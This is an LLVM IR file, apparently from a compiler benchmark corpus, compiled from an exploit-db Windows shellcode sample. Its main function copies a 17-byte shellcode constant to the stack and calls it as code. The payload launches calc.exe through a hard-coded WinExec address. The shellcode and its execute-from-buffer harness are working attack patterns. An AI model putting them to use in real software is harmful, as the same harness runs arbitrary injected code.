; ModuleID = '/home/carl/AnghaBench/exploitdb/shellcodes/windows_x86/extr_43773.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/shellcodes/windows_x86/extr_43773.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@__const.main.shellcode = private unnamed_addr constant [17 x i8] c"1\C9QhcalcT\B8\C7\93\C2w\FF\D0\00", align 16

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca [17 x i8], align 16
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %7 = bitcast [17 x i8]* %6 to i8*
  call void @llvm.memcpy.p0i8.p0i8.i64(i8* align 16 %7, i8* align 16 getelementptr inbounds ([17 x i8], [17 x i8]* @__const.main.shellcode, i32 0, i32 0), i64 17, i1 false)
  %8 = getelementptr inbounds [17 x i8], [17 x i8]* %6, i64 0, i64 0
  %9 = bitcast i8* %8 to void (...)*
  call void (...) %9()
  ret i32 0
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memcpy.p0i8.p0i8.i64(i8* noalias nocapture writeonly, i8* noalias nocapture readonly, i64, i1 immarg) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
